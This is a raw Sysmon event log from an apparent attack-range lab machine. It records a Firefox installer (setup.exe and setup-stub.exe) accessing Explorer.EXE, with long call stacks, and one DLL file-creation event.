13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000014317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\windows.storage.dll+1e3eaa(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64) 10341000x800000000000000014312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3e9c(wow64)|C:\Windows\System32\windows.storage.dll+10ace8(wow64) 11241100x800000000000000014311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-environment-l1-1-0.dll2021-01-18 13:59:52.161 10341000x800000000000000014310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 